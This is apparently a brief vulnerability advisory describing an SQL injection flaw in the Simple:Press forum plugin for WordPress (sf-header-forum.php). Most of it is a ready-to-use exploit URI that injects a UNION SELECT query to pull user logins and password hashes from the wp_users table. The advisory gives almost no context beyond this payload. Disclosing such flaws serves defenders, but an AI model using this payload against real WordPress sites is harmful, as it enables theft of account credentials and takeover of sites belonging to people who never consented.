Simple:Press Plugin for WordPress 'sf-header-forum.php' SQL Injection Vulnerability

Simple:Press Plugin for WordPress 'sf-header-forum.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2